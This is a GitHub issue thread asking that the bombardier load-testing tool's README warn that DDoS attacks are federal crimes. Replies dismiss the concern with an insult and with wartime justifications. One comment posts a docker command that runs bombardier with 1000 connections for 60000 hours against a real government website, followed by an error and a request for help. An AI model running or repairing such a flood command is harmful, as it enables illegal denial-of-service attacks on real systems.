### ISSUE TITLE
README should clearly inform people that DDOS is a Federal Crime

### ISSUE THREAD

**Issue by jfmario** [almerico/bombardier#19]
I don't know international law, but as I understand it what this repository is for and what is being encouraged in the comments of another issue here is a violation of Federal Computer Fraud and Abuse Act.

If I am correct, this repository should clearly indicate that.

**Comment by mu-b** [comment]
I hope your wifes boyfriend treats you well....

**Comment by rodrigogs** [comment]
Who cares? It is war!

**Comment by MaKiPL** [comment]
Did you know that attacking another independent country is also a crime?

**Comment by Ivan9307** [comment]
PS C:\Users\Ivan> docker run -d --rm alpine/bombardier -c 1000 -d 60000h -l http://kremlin.ru/
Не удалось найти образ 'alpine/bombardier:latest' локально
самое последнее: получение из alpine /bombardier
docker: на этой платформе нельзя использовать образ операционной системы «linux».
См. 'docker run --help'.

що я роблю не так?
